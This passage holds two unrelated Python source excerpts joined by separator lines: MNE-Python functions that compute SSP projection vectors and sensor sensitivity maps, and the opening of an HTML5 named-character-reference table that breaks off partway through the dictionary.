    parallel, dot, _ = parallel_func(np.dot, n_jobs)
    covs = parallel(dot(e, e.T) for e in epochs)
    if len(covs) == 0:
        raise RuntimeError('No good epochs found')
    n_chan = epochs.info['nchan']
    n_samples = len(epochs.times)
    # Guard against too few samples for a meaningful covariance estimate.
    _check_n_samples(n_samples * len(covs), n_chan)
    return sum(covs)
@verbose
def compute_proj_evoked(evoked, n_grad=2, n_mag=2, n_eeg=2, verbose=None):
    """Compute SSP (spatial space projection) vectors on Evoked

    Parameters
    ----------
    evoked : instance of Evoked
        The Evoked obtained by averaging the artifact
    n_grad : int
        Number of vectors for gradiometers
    n_mag : int
        Number of vectors for magnetometers
    n_eeg : int
        Number of vectors for EEG channels
    verbose : bool, str, int, or None
        If not None, override default verbose level (see mne.verbose).

    Returns
    -------
    projs : list
        List of projection vectors

    See Also
    --------
    compute_proj_raw, compute_proj_epochs
    """
    # Covariance of the averaged data.
    cov = np.dot(evoked.data, evoked.data.T)
    # Label the projectors with the evoked time window.
    t_first = evoked.times[0]
    t_last = evoked.times[-1]
    desc_prefix = "%-.3f-%-.3f" % (t_first, t_last)
    return _compute_proj(cov, evoked.info, n_grad, n_mag, n_eeg, desc_prefix)
@verbose
def compute_proj_raw(raw, start=0, stop=None, duration=1, n_grad=2, n_mag=2,
                     n_eeg=0, reject=None, flat=None, n_jobs=1, verbose=None):
    """Compute SSP (spatial space projection) vectors on Raw

    Parameters
    ----------
    raw : instance of Raw
        A raw object to use the data from.
    start : float
        Time (in sec) to start computing SSP.
    stop : float
        Time (in sec) to stop computing SSP.
        None will go to the end of the file.
    duration : float
        Duration (in sec) to chunk data into for SSP
        If duration is None, data will not be chunked.
    n_grad : int
        Number of vectors for gradiometers.
    n_mag : int
        Number of vectors for magnetometers.
    n_eeg : int
        Number of vectors for EEG channels.
    reject : dict | None
        Epoch rejection configuration (see Epochs).
    flat : dict | None
        Epoch flat configuration (see Epochs).
    n_jobs : int
        Number of jobs to use to compute covariance.
    verbose : bool, str, int, or None
        If not None, override default verbose level (see mne.verbose).

    Returns
    -------
    projs: list
        List of projection vectors

    See Also
    --------
    compute_proj_epochs, compute_proj_evoked
    """
    if duration is not None:
        # Chunked path: cut the raw data into fixed-length epochs so that
        # rejection/flat criteria can be applied per chunk.
        events = make_fixed_length_events(raw, 999, start, stop, duration)
        epochs = Epochs(raw, events, None, tmin=0., tmax=duration,
                        picks=pick_types(raw.info, meg=True, eeg=True,
                                         eog=True, ecg=True, emg=True,
                                         exclude='bads'),
                        reject=reject, flat=flat, add_eeg_ref=False)
        data = _compute_cov_epochs(epochs, n_jobs)
        info = epochs.info
        # NOTE(review): ``stop=0`` is treated the same as None (end of
        # file) by this truthiness test — confirm that is intended.
        if not stop:
            stop = raw.n_times / raw.info['sfreq']
    else:
        # Unchunked path: take the raw segment in one piece.
        # convert to sample indices
        start = max(raw.time_as_index(start)[0], 0)
        stop = raw.time_as_index(stop)[0] if stop else raw.n_times
        stop = min(stop, raw.n_times)
        data, times = raw[:, start:stop]
        _check_n_samples(stop - start, data.shape[0])
        data = np.dot(data, data.T)  # compute data covariance
        info = raw.info
        # convert back to times
        start = start / raw.info['sfreq']
        stop = stop / raw.info['sfreq']
    # Label the projectors with the time span they were computed from.
    desc_prefix = "Raw-%-.3f-%-.3f" % (start, stop)
    projs = _compute_proj(data, info, n_grad, n_mag, n_eeg, desc_prefix)
    return projs
def sensitivity_map(fwd, projs=None, ch_type='grad', mode='fixed', exclude=[],
                    verbose=None):
    """Compute sensitivity map

    Such maps are used to know how much sources are visible by a type
    of sensor, and how much projections shadow some sources.

    Parameters
    ----------
    fwd : Forward
        The forward operator. Must have been computed with free orientation.
    projs : list
        List of projection vectors.
    ch_type : 'grad' | 'mag' | 'eeg'
        The type of sensors to use.
    mode : str
        The type of sensitivity map computed. See manual. Should be 'free',
        'fixed', 'ratio', 'radiality', 'angle', 'remaining', or 'dampening'
        corresponding to the argument --map 1, 2, 3, 4, 5, 6 and 7 of the
        command mne_sensitivity_map.
    exclude : list of string | str
        List of channels to exclude. If empty do not exclude any (default).
        If 'bads', exclude channels in fwd['info']['bads'].
    verbose : bool, str, int, or None
        If not None, override default verbose level (see mne.verbose).

    Returns
    -------
    stc : SourceEstimate | VolSourceEstimate
        The sensitivity map as a SourceEstimate or VolSourceEstimate instance
        for visualization.
    """
    # NOTE(review): accepts a ``verbose`` argument but carries no @verbose
    # decorator — confirm whether that is intended.
    # check strings
    if ch_type not in ['eeg', 'grad', 'mag']:
        # Fixed: closing quote after 'grad' was missing in the message.
        raise ValueError("ch_type should be 'eeg', 'mag' or 'grad' (got %s)"
                         % ch_type)
    if mode not in ['free', 'fixed', 'ratio', 'radiality', 'angle',
                    'remaining', 'dampening']:
        raise ValueError('Unknown mode type (got %s)' % mode)

    # check forward
    if is_fixed_orient(fwd, orig=True):
        # Fixed: message read "should must be computed".
        raise ValueError('fwd should be computed with free orientation')

    # limit forward (this will make a copy of the data for us)
    if ch_type == 'eeg':
        fwd = pick_types_forward(fwd, meg=False, eeg=True, exclude=exclude)
    else:
        fwd = pick_types_forward(fwd, meg=ch_type, eeg=False, exclude=exclude)

    # Convert in place to surface orientation with free orientation kept.
    convert_forward_solution(fwd, surf_ori=True, force_fixed=False,
                             copy=False, verbose=False)
    if not fwd['surf_ori'] or is_fixed_orient(fwd):
        raise RuntimeError('Error converting solution, please notify '
                           'mne-python developers')

    gain = fwd['sol']['data']

    # Make sure EEG has average
    if ch_type == 'eeg':
        if projs is None or not _has_eeg_average_ref_proj(projs):
            eeg_ave = [make_eeg_average_ref_proj(fwd['info'])]
        else:
            eeg_ave = []
        projs = eeg_ave if projs is None else projs + eeg_ave

    # Construct the projector; the residual modes need the projector itself
    # (proj, U) rather than the projected gain.
    residual_types = ['angle', 'remaining', 'dampening']
    if projs is not None:
        proj, ncomp, U = make_projector(projs, fwd['sol']['row_names'],
                                        include_active=True)
        # do projection for most types
        if mode not in residual_types:
            gain = np.dot(proj, gain)
        elif ncomp == 0:
            raise RuntimeError('No valid projectors found for channel type '
                               '%s, cannot compute %s' % (ch_type, mode))
    # can only run the last couple methods if there are projectors
    elif mode in residual_types:
        raise ValueError('No projectors used, cannot compute %s' % mode)

    n_sensors, n_dipoles = gain.shape
    n_locations = n_dipoles // 3
    sensitivity_map = np.empty(n_locations)

    for k in range(n_locations):
        # Three columns per source location (free orientation).
        gg = gain[:, 3 * k:3 * (k + 1)]
        if mode != 'fixed':
            s = linalg.svd(gg, full_matrices=False, compute_uv=False)
        if mode == 'free':
            sensitivity_map[k] = s[0]
        else:
            gz = linalg.norm(gg[:, 2])  # the normal component
            if mode == 'fixed':
                sensitivity_map[k] = gz
            elif mode == 'ratio':
                sensitivity_map[k] = gz / s[0]
            elif mode == 'radiality':
                sensitivity_map[k] = 1. - (gz / s[0])
            else:
                if mode == 'angle':
                    co = linalg.norm(np.dot(gg[:, 2], U))
                    sensitivity_map[k] = co / gz
                else:
                    p = linalg.norm(np.dot(proj, gg[:, 2]))
                    if mode == 'remaining':
                        sensitivity_map[k] = p / gz
                    elif mode == 'dampening':
                        sensitivity_map[k] = 1. - p / gz
                    else:
                        raise ValueError('Unknown mode type (got %s)' % mode)

    # only normalize fixed and free methods
    if mode in ['fixed', 'free']:
        sensitivity_map /= np.max(sensitivity_map)

    subject = _subject_from_forward(fwd)
    if fwd['src'][0]['type'] == 'vol':  # volume source space
        vertices = fwd['src'][0]['vertno']
        SEClass = VolSourceEstimate
    else:
        vertices = [fwd['src'][0]['vertno'], fwd['src'][1]['vertno']]
        SEClass = SourceEstimate
    stc = SEClass(sensitivity_map[:, np.newaxis], vertices=vertices, tmin=0,
                  tstep=1, subject=subject)
    return stc
|
|
# -*- coding: ascii -*- pylint: disable = too-many-lines
r"""
:Copyright:
Copyright 2012 - 2015
Andr\xe9 Malo or his licensors, as applicable
:License:
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
==================================
HTML5 named character references
==================================
HTML5 named character references.
"""
# The source file is kept pure-ascii on purpose; the docstring and author
# name are stored with escape sequences and decoded to real (non-ascii)
# characters at import time.
if __doc__: # pragma: no cover
    # pylint: disable = redefined-builtin
    __doc__ = __doc__.encode('ascii').decode('unicode_escape')
__author__ = r"Andr\xe9 Malo".encode('ascii').decode('unicode_escape')
__docformat__ = "restructuredtext en"
#: HTML named character references, generated from
#: `the HTML5 spec`_\.
#:
#: .. _the HTML5 spec: http://www.w3.org/TR/html5/
#: syntax.html#named-character-references
#:
#: :Type: ``dict``
htmlentities = {
u'Aacute': u'\xc1',
u'aacute': u'\xe1',
u'Abreve': u'\u0102',
u'abreve': u'\u0103',
u'ac': u'\u223e',
u'acd': u'\u223f',
u'acE': u'\u223e\u0333',
u'Acirc': u'\xc2',
u'acirc': u'\xe2',
u'acute': u'\xb4',
u'Acy': u'\u0410',
u'acy': u'\u0430',
u'AElig': u'\xc6',
u'aelig': u'\xe6',
u'af': u'\u2061',
u'Afr': '5\xd8\x04\xdd'.decode("utf-16-le"),
u'afr': '5\xd8\x1e\xdd'.decode("utf-16-le"),
u'Agrave': u'\xc0',
u'agrave': u'\xe0',
u'alefsym': u'\u2135',
u'aleph': u'\u2135',
u'Alpha': u'\u0391',
u'alpha': u'\u03b1',
u'Amacr': u'\u0100',
u'amacr': u'\u0101',
u'amalg': u'\u2a3f',
u'AMP': u'&',
u'amp': u'&',
u'And': u'\u2a53',
u'and': u'\u2227',
u'andand': u'\u2a55',
u'andd': u'\u2a5c',
u'andslope': u'\u2a58',
u'andv': u'\u2a5a',
u'ang': u'\u2220',
u'ange': u'\u29a4',
u'angle': u'\u2220',
u'angmsd': u'\u2221',
u'angmsdaa': u'\u29a8',
u'angmsdab': u'\u29a9',
u'angmsdac': u'\u29aa',
u'angmsdad': u'\u29ab',
u'angmsdae': u'\u29ac',
u'angmsdaf': u'\u29ad',
u'angmsdag': u'\u29ae',
u'angmsdah': u'\u29af',
u'angrt': u'\u221f',
u'angrtvb': u'\u22be',
u'angrtvbd': u'\u299d',
u'angsph': u'\u2222',
u'angst': u'\xc5',
u'angzarr': u'\u237c',
u'Aogon': u'\u0104',
u'aogon': u'\u0105',
u'Aopf': '5\xd88\xdd'.decode("utf-16-le"),
u'aopf': '5\xd8R\xdd'.decode("utf-16-le"),
u'ap': u'\u2248',
u'apacir': u'\u2a6f',
u'apE': u'\u2a70',
u'ape': u'\u224a',
u'apid': u'\u224b',
u'apos': u'\'',
u'ApplyFunction': u'\u2061',
u'approx': u'\u2248',
u'approxeq': u'\u224a',
u'Aring': u'\xc5',
u'aring': u'\xe5',
u'Ascr': '5\xd8\x9c\xdc'.decode("utf-16-le"),
u'ascr': '5\xd8\xb6\xdc'.decode("utf-16-le"),
u'Assign': u'\u2254',
u'ast': u'*',
u'asymp': u'\u2248',
u'asympeq': u'\u224d',
u'Atilde': u'\xc3',
u'atilde': u'\xe3',
u'Auml': u'\xc4',
u'auml': u'\xe4',
u'awconint': u'\u2233',
u'awint': u'\u2a11',
u'backcong': u'\u224c',
u'backepsilon': u'\u03f6',
u'backprime': u'\u2035',
u'backsim': u'\u223d',
u'backsimeq': u'\u22cd',
u'Backslash': u'\u2216',
u'Barv': u'\u2ae7',
u'barvee': u'\u22bd',
u'Barwed': u'\u2306',
u'barwed': u'\u2305',
u'barwedge': u'\u2305',
u'bbrk': u'\u23b5',
u'bbrktbrk': u'\u23b6',
u'bcong': u'\u224c',
u'Bcy': u'\u0411',
u'bcy': u'\u0431',
u'bdquo': u'\u201e',
u'becaus': u'\u2235',
u'Because': u'\u2235',
u'because': u'\u2235',
u'bemptyv': u'\u29b0',
u'bepsi': u'\u03f6',
u'bernou': u'\u212c',
u'Bernoullis': u'\u212c',
u'Beta': u'\u0392',
u'beta': u'\u03b2',
u'beth': u'\u2136',
u'between': u'\u226c',
u'Bfr': '5\xd8\x05\xdd'.decode("utf-16-le"),
u'bfr': '5\xd8\x1f\xdd'.decode("utf-16-le"),
u'bigcap': u'\u22c2',
u'bigcirc': u'\u25ef',
u'bigcup': u'\u22c3',
u'bigodot': u'\u2a00',
u'bigoplus': u'\u2a01',
u'bigotimes': u'\u2a02',
u'bigsqcup': u'\u2a06',
u'bigstar': u'\u2605',
u'bigtriangledown': u'\u25bd',
u'bigtriangleup': u'\u25b3',
u'biguplus': u'\u2a04',
u'bigvee': u'\u22c1',
u'bigwedge': u'\u22c0',
u'bkarow': u'\u290d',
u'blacklozenge': u'\u29eb',
u'blacksquare': u'\u25aa',
u'blacktriangle': u'\u25b4',
u'blacktriangledown': u'\u25be',
u'blacktriangleleft': u'\u25c2',
u'blacktriangleright': u'\u25b8',
u'blank': u'\u2423',
u'blk12': u'\u2592',
u'blk14': u'\u2591',
u'blk34': u'\u2593',
u'block': u'\u2588',
u'bne': u'=\u20e5',
u'bnequiv': u'\u2261\u20e5',
u'bNot': u'\u2aed',
u'bnot': u'\u2310',
u'Bopf': '5\xd89\xdd'.decode("utf-16-le"),
u'bopf': '5\xd8S\xdd'.decode("utf-16-le"),
u'bot': u'\u22a5',
u'bottom': u'\u22a5',
u'bowtie': u'\u22c8',
u'boxbox': u'\u29c9',
u'boxDL': u'\u2557',
u'boxDl': u'\u2556',
u'boxdL': u'\u2555',
u'boxdl': u'\u2510',
u'boxDR': u'\u2554',
u'boxDr': u'\u2553',
u'boxdR': u'\u2552',
u'boxdr': u'\u250c',
u'boxH': u'\u2550',
u'boxh': u'\u2500',
u'boxHD': u'\u2566',
u'boxHd': u'\u2564',
u'boxhD': u'\u2565',
u'boxhd': u'\u252c',
u'boxHU': u'\u2569',
u'boxHu': u'\u2567',
u'boxhU': u'\u2568',
u'boxhu': u'\u2534',
u'boxminus': u'\u229f',
u'boxplus': u'\u229e',
u'boxtimes': u'\u22a0',
u'boxUL': u'\u255d',
u'boxUl': u'\u255c',
u'boxuL': u'\u255b',
u'boxul': u'\u2518',
u'boxUR': u'\u255a',
u'boxUr': u'\u2559',
u'boxuR': u'\u2558',
u'boxur': u'\u2514',
u'boxV': u'\u2551',
u'boxv': u'\u2502',
u'boxVH': u'\u256c',
u'boxVh': u'\u256b',
u'boxvH': u'\u256a',
u'boxvh': u'\u253c',
u'boxVL': u'\u2563',
u'boxVl': u'\u2562',
u'boxvL': u'\u2561',
u'boxvl': u'\u2524',
u'boxVR': u'\u2560',
u'boxVr': u'\u255f',
u'boxvR': u'\u255e',
u'boxvr': u'\u251c',
u'bprime': u'\u2035',
u'Breve': u'\u02d8',
u'breve': u'\u02d8',
u'brvbar': u'\xa6',
u'Bscr': u'\u212c',
u'bscr': '5\xd8\xb7\xdc'.decode("utf-16-le"),
u'bsemi': u'\u204f',
u'bsim': u'\u223d',
u'bsime': u'\u22cd',
u'bsol': u'\\',
u'bsolb': u'\u29c5',
u'bsolhsub': u'\u27c8',
u'bull': u'\u2022',
u'bullet': u'\u2022',
u'bump': u'\u224e',
u'bumpE': u'\u2aae',
u'bumpe': u'\u224f',
u'Bumpeq': u'\u224e',
u'bumpeq': u'\u224f',
u'Cacute': u'\u0106',
u'cacute': u'\u0107',
u'Cap': u'\u22d2',
u'cap': u'\u2229',
u'capand': u'\u2a44',
u'capbrcup': u'\u2a49',
u'capcap': u'\u2a4b',
u'capcup': u'\u2a47',
u'capdot': u'\u2a40',
u'CapitalDifferentialD': u'\u2145',
u'caps': u'\u2229\ufe00',
u'caret': u'\u2041',
u'caron': u'\u02c7',
u'Cayleys': u'\u212d',
u'ccaps': u'\u2a4d',
u'Ccaron': u'\u010c',
u'ccaron': u'\u010d',
u'Ccedil': u'\xc7',
u'ccedil': u'\xe7',
u'Ccirc': u'\u0108',
u'ccirc': u'\u0109',
u'Cconint': u'\u2230',
u'ccups': u'\u2a4c',
u'ccupssm': u'\u2a50',
u'Cdot': u'\u010a',
u'cdot': u'\u010b',
u'cedil': u'\xb8',
u'Cedilla': u'\xb8',
u'cemptyv': u'\u29b2',
u'cent': u'\xa2',
u'CenterDot': u'\xb7',
u'centerdot': u'\xb7',
u'Cfr': u'\u212d',
u'cfr': '5\xd8 \xdd'.decode("utf-16-le"),
u'CHcy': u'\u0427',
u'chcy': u'\u0447',
u'check': u'\u2713',
u'checkmark': u'\u2713',
u'Chi': u'\u03a7',
u'chi': u'\u03c7',
u'cir': u'\u25cb',
u'circ': u'\u02c6',
u'circeq': u'\u2257',
u'circlearrowleft': u'\u21ba',
u'circlearrowright': u'\u21bb',
u'circledast': u'\u229b',
u'circledcirc': u'\u229a',
u'circleddash': u'\u229d',
u'CircleDot': u'\u2299',
u'circledR': u'\xae',
u'circledS': u'\u24c8',
u'CircleMinus': u'\u2296',
u'CirclePlus': u'\u2295',
u'CircleTimes': u'\u2297',
u'cirE': u'\u29c3',
u'cire': u'\u2257',
u'cirfnint': u'\u2a10',
u'cirmid': u'\u2aef',
u'cirscir': u'\u29c2',
u'ClockwiseContourIntegral': u'\u2232',
u'CloseCurlyDoubleQuote': u'\u201d',
u'CloseCurlyQuote': u'\u2019',
u'clubs': u'\u2663',
u'clubsuit': u'\u2663',
u'Colon': u'\u2237',
u'colon': u':',
u'Colone': u'\u2a74',
u'colone': u'\u2254',
u'coloneq': u'\u2254',
u'comma': u',',
u'commat': u'@',
u'comp': u'\u2201',
u'compfn': u'\u2218',
u'complement': u'\u2201',
u'complexes': u'\u2102',
u'cong': u'\u2245',
u'congdot': u'\u2a6d',
u'Congruent': u'\u2261',
u'Conint': u'\u222f',
u'conint': u'\u222e',
u'ContourIntegral': u'\u222e',
u'Copf': u'\u2102',
u'copf': '5\xd8T\xdd'.decode("utf-16-le"),
u'coprod': u'\u2210',
u'Coproduct': u'\u2210',
u'COPY': u'\xa9',
u'copy': u'\xa9',
u'copysr': u'\u2117',
u'CounterClockwiseContourIntegral': u'\u2233',
u'crarr': u'\u21b5',
u'Cross': u'\u2a2f',
u'cross': u'\u2717',
u'Cscr': '5\xd8\x9e\xdc'.decode("utf-16-le"),
u'cscr': '5\xd8\xb8\xdc'.decode("utf-16-le"),
u'csub': u'\u2acf',
u'csube': u'\u2ad1',
u'csup': u'\u2ad0',
u'csupe': u'\u2ad2',
u'ctdot': u'\u22ef',
u'cudarrl': u'\u2938',
u'cudarrr': u'\u2935',
u'cuepr': u'\u22de',
u'cuesc': u'\u22df',
u'cularr': u'\u21b6',
u'cularrp': u'\u293d',
u'Cup': u'\u22d3',
u'cup': u'\u222a',
u'cupbrcap': u'\u2a48',
u'CupCap': u'\u224d',
u'cupcap': u'\u2a46',
u'cupcup': u'\u2a4a',
u'cupdot': u'\u228d',
u'cupor': u'\u2a45',
u'cups': u'\u222a\ufe00',
u'curarr': u'\u21b7',
u'curarrm': u'\u293c',
u'curlyeqprec': u'\u22de',
u'curlyeqsucc': u'\u22df',
u'curlyvee': u'\u22ce',
u'curlywedge': u'\u22cf',
u'curren': u'\xa4',
u'curvearrowleft': u'\u21b6',
u'curvearrowright': u'\u21b7',
u'cuvee': u'\u22ce',
u'cuwed': u'\u22cf',
u'cwconint': u'\u2232',
u'cwint': u'\u2231',
u'cylcty': u'\u232d',
u'Dagger': u'\u2021',
u'dagger': u'\u2020',
u'daleth': u'\u2138',
u'Darr': u'\u21a1',
u'dArr': u'\u21d3',
u'darr': u'\u2193',
u'dash': u'\u2010',
u'Dashv': u'\u2ae4',
u'dashv': u'\u22a3',
u'dbkarow': u'\u290f',
u'dblac': u'\u02dd',
u'Dcaron': u'\u010e',
u'dcaron': u'\u010f',
u'Dcy': u'\u0414',
u'dcy': u'\u0434',
u'DD': u'\u2145',
u'dd': u'\u2146',
u'ddagger': u'\u2021',
u'ddarr': u'\u21ca',
u'DDotrahd': u'\u2911',
u'ddotseq': u'\u2a77',
u'deg': u'\xb0',
u'Del': u'\u2207',
u'Delta': u'\u0394',
u'delta': u'\u03b4',
u'demptyv': u'\u29b1',
u'dfisht': u'\u297f',
u'Dfr': '5\xd8\x07\xdd'.decode("utf-16-le"),
u'dfr': '5\xd8!\xdd'.decode("utf-16-le"),
u'dHar': u'\u2965',
u'dharl': u'\u21c3',
u'dharr': u'\u21c2',
u'DiacriticalAcute': u'\xb4',
u'DiacriticalDot': u'\u02d9',
u'DiacriticalDoubleAcute': u'\u02dd',
u'DiacriticalGrave': u'`',
u'DiacriticalTilde': u'\u02dc',
u'diam': u'\u22c4',
u'Diamond': u'\u22c4',
u'diamond': u'\u22c4',
u'diamondsuit': u'\u2666',
u'diams': u'\u2666',
u'die': u'\xa8',
u'DifferentialD': u'\u2146',
u'digamma': u'\u03dd',
u'disin': u'\u22f2',
u'div': u'\xf7',
u'divide': u'\xf7',
u'divideontimes': u'\u22c7',
u'divonx': u'\u22c7',
u'DJcy': u'\u0402',
u'djcy': u'\u0452',
u'dlcorn': u'\u231e',
u'dlcrop': u'\u230d',
u'dollar': u'$',
u'Dopf': '5\xd8;\xdd'.decode("utf-16-le"),
u'dopf': '5\xd8U\xdd'.decode("utf-16-le"),
u'Dot': u'\xa8',
u'dot': u'\u02d9',
u'DotDot': u'\u20dc',
u'doteq': u'\u2250',
u'doteqdot': u'\u2251',
u'DotEqual': u'\u2250',
u'dotminus': u'\u2238',
u'dotplus': u'\u2214',
u'dotsquare': u'\u22a1',
u'doublebarwedge': u'\u2306',
u'DoubleContourIntegral': u'\u222f',
u'DoubleDot': u'\xa8',
u'DoubleDownArrow': u'\u21d3',
u'DoubleLeftArrow': u'\u21d0',
u'DoubleLeftRightArrow': u'\u21d4',
u'DoubleLeftTee': u'\u2ae4',
u'DoubleLongLeftArrow': u'\u27f8',
u'DoubleLongLeftRightArrow': u'\u27fa',
u'DoubleLongRightArrow': u'\u27f9',
u'DoubleRightArrow': u'\u21d2',
u'DoubleRightTee': u'\u22a8',
u'DoubleUpArrow': u'\u21d1',
u'DoubleUpDownArrow': u'\u21d5',
u'DoubleVerticalBar': u'\u2225',
u'DownArrow': u'\u2193',
u'Downarrow': u'\u21d3',
u'downarrow': u'\u2193',
u'DownArrowBar': u'\u2913',
u'DownArrowUpArrow': u'\u21f5',
u'DownBreve': u'\u0311',
u'downdownarrows': u'\u21ca',
u'downharpoonleft': u'\u21c3',
u'downharpoonright': u'\u21c2',
u'DownLeftRightVector': u'\u2950',
u'DownLeftTeeVector': u'\u295e',
u'DownLeftVector': u'\u21bd',
u'DownLeftVectorBar': u'\u2956',
u'DownRightTeeVector': u'\u295f',
u'DownRightVector': u'\u21c1',
u'DownRightVectorBar': u'\u2957',
u'DownTee': u'\u22a4',
u'DownTeeArrow': u'\u21a7',
u'drbkarow': u'\u2910',
u'drcorn': u'\u231f',
u'drcrop': u'\u230c',
u'Dscr': '5\xd8\x9f\xdc'.decode("utf-16-le"),
u'dscr': '5\xd8\xb9\xdc'.decode("utf-16-le"),
u'DScy': u'\u0405',
u'dscy': u'\u0455',
u'dsol': u'\u29f6',
u'Dstrok': u'\u0110',
u'dstrok': u'\u0111',
u'dtdot': u'\u22f1',
u'dtri': u'\u25bf',
u'dtrif': u'\u25be',
u'duarr': u'\u21f5',
u'duhar': u'\u296f',
u'dwangle': u'\u29a6',
u'DZcy': u'\u040f',
u'dzcy': u'\u045f',
u'dzigrarr': u'\u27ff',
u'Eacute': u'\xc9',
u'eacute': u'\xe9',
u'easter': u'\u2a6e',
u'Ecaron': u'\u011a',
u'ecaron': u'\u011b',
u'ecir': u'\u2256',
u'Ecirc': u'\xca',
u'ecirc': u'\xea',
u'ecolon': u'\u2255',
u'Ecy': u'\u042d',
u'ecy': u'\u044d',
u'eDDot': u'\u2a77',
u'Edot': u'\u0116',
u'eDot': u'\u2251',
u'edot': u'\u0117',
u'ee': u'\u2147',
u'efDot': u'\u2252',
u'Efr': '5\xd8\x08\xdd'.decode("utf-16-le"),
u'efr': '5\xd8"\xdd'.decode("utf-16-le"),
u'eg': u'\u2a9a',
u'Egrave': u'\xc8',
u'egrave': u'\xe8',
u'egs': u'\u2a96',
u'egsdot': u'\u2a98',
u'el': u'\u2a99',
u'Element': u'\u2208',
u'elinters': u'\u23e7',
u'ell': u'\u2113',
u'els': u'\u2a95',
u'elsdot': u'\u2a97',
u'Emacr': u'\u0112',
u'emacr': u'\u0113',
u'empty': u'\u2205',
u'emptyset': u'\u2205',
u'EmptySmallSquare': u'\u25fb',
u'emptyv': u'\u2205',
u'EmptyVerySmallSquare': u'\u25ab',
u'emsp13': u'\u2004',
u'emsp14': u'\u2005',
u'emsp': u'\u2003',
u'ENG': u'\u014a',
u'eng': u'\u014b',
u'ensp': u'\u2002',
u'Eogon': u'\u0118',
u'eogon': u'\u0119',
u'Eopf': '5\xd8<\xdd'.decode("utf-16-le"),
u'eopf': '5\xd8V\xdd'.decode("utf-16-le"),
u'epar': u'\u22d5',
u'eparsl': u'\u29e3',
u'eplus': u'\u2a71',
u'epsi': u'\u03b5',
u'Epsilon': u'\u0395',
u'epsilon': u'\u03b5',
u'epsiv': u'\u03f5',
u'eqcirc': u'\u2256',
u'eqcolon': u'\u2255',
u'eqsim': u'\u2242',
u'eqslantgtr': u'\u2a96',
u'eqslantless': u'\u2a95',
u'Equal': u'\u2a75',
u'equals': u'=',
u'EqualTilde': u'\u2242',
u'equest': u'\u225f',
u'Equilibrium': u'\u21cc',
u'equiv': u'\u2261',
u'equivDD': u'\u2a78',
u'eqvparsl': u'\u29e5',
u'erarr': u'\u2971',
u'erDot': u'\u2253',
u'Escr': u'\u2130',
u'escr': u'\u212f',
u'esdot': u'\u2250',
u'Esim': u'\u2a73',
u'esim': u'\u2242',
u'Eta': u'\u0397',
u'eta': u'\u03b7',
u'ETH': u'\xd0',
u'eth': u'\xf0',
u'Euml': u'\xcb',
u'euml': u'\xeb',
u'euro': u'\u20ac',
u'excl': u'!',
u'exist': u'\u2203',
u'Exists': u'\u2203',
u'expectation': u'\u2130',
u'ExponentialE': u'\u2147',
u'exponentiale': u'\u2147',
u'fallingdotseq': u'\u2252',
u'Fcy': u'\u0424',
u'fcy': u'\u0444',
u'female': u'\u2640',
u'ffilig': u'\ufb03',
u'fflig': u'\ufb00',
u'ffllig': u'\ufb04',
u'Ffr': '5\xd8\t\xdd'.decode("utf-16-le"),
u'ffr': '5\xd8#\xdd'.decode("utf-16-le"),
u'filig': u'\ufb01',
u'FilledSmallSquare': u'\u25fc',
u'FilledVerySmallSquare': u'\u25aa',
u'fjlig': u'fj',
u'flat': u'\u266d',
u'fllig': u'\ufb02',
u'fltns': u'\u25b1',
u'fnof': u'\u0192',
u'Fopf': '5\xd8=\xdd'.decode("utf-16-le"),
u'fopf': '5\xd8W\xdd'.decode("utf-16-le"),
u'ForAll': u'\u2200',
u'forall': u'\u2200',
u'fork': u'\u22d4',
u'forkv': u'\u2ad9',
u'Fouriertrf': u'\u2131',
u'fpartint': u'\u2a0d',
u'frac12': u'\xbd',
u'frac13': u'\u2153',
u'frac14': u'\xbc',
u'frac15': u'\u2155',
u'frac16': u'\u2159',
u'frac18': u'\u215b',
u'frac23': u'\u2154',
u'frac25': u'\u2156',
u'frac34': u'\xbe',
u'frac35': u'\u2157',
u'frac38': u'\u215c',
u'frac45': u'\u2158',
u'frac56': u'\u215a',
u'frac58': u'\u215d',
u'frac78': u'\u215e',
u'frasl': u'\u2044',
u'frown': u'\u2322',
u'Fscr': u'\u2131',
u'fscr': '5\xd8\xbb\xdc'.decode("utf-16-le"),
u'gacute': u'\u01f5',
u'Gamma': u'\u0393',
u'gamma': u'\u03b3',
u'Gammad': u'\u03dc',
u'gammad': u'\u03dd',
u'gap': u'\u2a86',
u'Gbreve': u'\u011e',
u'gbreve': u'\u011f',
u'Gcedil': u'\u0122',
u'Gcirc': u'\u011c',
u'gcirc': u'\u011d',
u'Gcy': u'\u0413',
u'gcy': u'\u0433',
u'Gdot': u'\u0120',
u'gdot': u'\u0121',
u'gE': u'\u2267',
u'ge': u'\u2265',
u'gEl': u'\u2a8c',
u'gel': u'\u22db',
u'geq': u'\u2265',
u'geqq': u'\u2267',
u'geqslant': u'\u2a7e',
u'ges': u'\u2a7e',
u'gescc': u'\u2aa9',
u'gesdot': u'\u2a80',
u'gesdoto': u'\u2a82',
u'gesdotol': u'\u2a84',
u'gesl': u'\u22db\ufe00',
u'gesles': u'\u2a94',
u'Gfr': '5\xd8\n\xdd'.decode("utf-16-le"),
u'gfr': '5\xd8$\xdd'.decode("utf-16-le"),
u'Gg': u'\u22d9',
u'gg': u'\u226b',
u'ggg': u'\u22d9',
u'gimel': u'\u2137',
u'GJcy': u'\u0403',
u'gjcy': u'\u0453',
u'gl': u'\u2277',
u'gla': u'\u2aa5',
u'glE': u'\u2a92',
u'glj': u'\u2aa4',
u'gnap': u'\u2a8a',
u'gnapprox': u'\u2a8a',
u'gnE': u'\u2269',
u'gne': u'\u2a88',
u'gneq': u'\u2a88',
u'gneqq': u'\u2269',
u'gnsim': u'\u22e7',
u'Gopf': '5\xd8>\xdd'.decode("utf-16-le"),
u'gopf': '5\xd8X\xdd'.decode("utf-16-le"),
u'grave': u'`',
u'GreaterEqual': u'\u2265',
u'GreaterEqualLess': u'\u22db',
u'GreaterFullEqual': u'\u2267',
u'GreaterGreater': u'\u2aa2',
u'GreaterLess': u'\u2277',
u'GreaterSlantEqual': u'\u2a7e',
u'GreaterTilde': u'\u2273',
u'Gscr': '5\xd8\xa2\xdc'.decode("utf-16-le"),
u'gscr': u'\u210a',
u'gsim': u'\u2273',
u'gsime': u'\u2a8e',
u'gsiml': u'\u2a90',
u'GT': u'>',
u'gt': u'>',
